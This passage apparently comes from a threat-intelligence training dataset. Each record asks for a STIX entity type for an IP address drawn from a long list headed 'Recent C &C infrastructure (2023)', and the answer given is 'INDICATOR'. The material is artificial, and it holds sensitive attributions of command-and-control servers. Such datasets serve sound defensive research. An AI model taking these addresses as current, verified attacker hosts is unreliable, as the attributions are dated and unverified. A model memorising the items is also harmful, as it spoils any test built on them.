178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n45.77.115.67\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n108.61.211.250\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n89.185.84.48\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n164.92.72.212\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n202.182.116.135\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 